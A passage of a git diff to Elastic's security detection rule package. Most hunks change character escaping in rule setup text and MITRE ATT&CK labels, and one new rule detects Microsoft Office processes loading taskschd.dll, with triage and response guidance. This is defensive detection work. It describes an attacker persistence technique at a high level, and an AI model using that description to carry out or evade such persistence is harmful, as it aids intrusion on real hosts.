guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json index 7bba67449cd..8077dcc289c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json index 33fa71f27e7..9f869c8b825 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json index b166dc503e6..c3d0efc1f06 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json index 2c396bde06b..1563576d5f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json index 90988b39e33..b6a2bfdb04b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json index 78c3d0a805f..21de33d9b4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json index 1c050924777..763581c0924 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json @@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json index b7197114215..c76af9e3088 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json @@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json index 460ae4744f3..fa18ef710ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json @@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json index 7b6c473a02c..b49bc5c718b 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json @@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json index d462014a06e..bde666baffc 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107.json new file mode 100644 index 00000000000..d35cc028c79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Image Load (taskschd.dll) from MS Office", + "note": "## Triage and analysis\n\n### Investigating Suspicious Image Load (taskschd.dll) from MS Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. These attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\n`taskschd.dll` provides Command Object Model (COM) interfaces for the Windows Task Scheduler service, allowing developers to programmatically manage scheduled tasks.\n\nThis rule looks for an MS Office process loading `taskschd.dll`, which may indicate an adversary abusing COM to configure a scheduled task. This can happen as part of a phishing attack, when a malicious office document registers the scheduled task to download the malware \"stage 2\" or to establish persistent access.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Analyze the host's scheduled tasks and explore the related Windows events to determine if tasks were created or deleted (Event IDs 4698 and 4699).\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the files downloaded during the past 24 hours.\n - Identify files that are related or can be executed in MS Office.\n - Identify and analyze macros that these documents contain.\n - Identify suspicious traits in the office macros, such as encoded or encrypted sections.\n- Retrieve the suspicious files identified in the previous step and determine if they are malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related Rules\n\n- Suspicious WMI Image Load from MS Office - 891cb88e-441a-4c3e-be2d-120d99fe7b0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107", + "type": 